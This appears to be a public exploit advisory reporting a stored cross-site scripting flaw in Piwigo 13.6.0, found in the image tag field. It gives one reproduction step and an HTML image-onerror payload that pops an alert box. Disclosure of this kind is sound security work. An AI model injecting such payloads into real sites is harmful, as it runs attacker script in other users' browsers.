Exploits / Vulnerability Discovered : 2023-04-20 |
Type : webapps |
Platform : php
This exploit / vulnerability Piwigo 13.6.0 stored crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
Application: Piwigo
Version: 13.6.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://piwigo.org/
Software Link: https://piwigo.org/get-piwigo
Date of found: 18.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
1.After uploading the image, we write <img%20src=x%20onerror=alert(4)> instead of the tag(keyword) while editing the image)
payload: <img%20src=x%20onerror=alert(4)>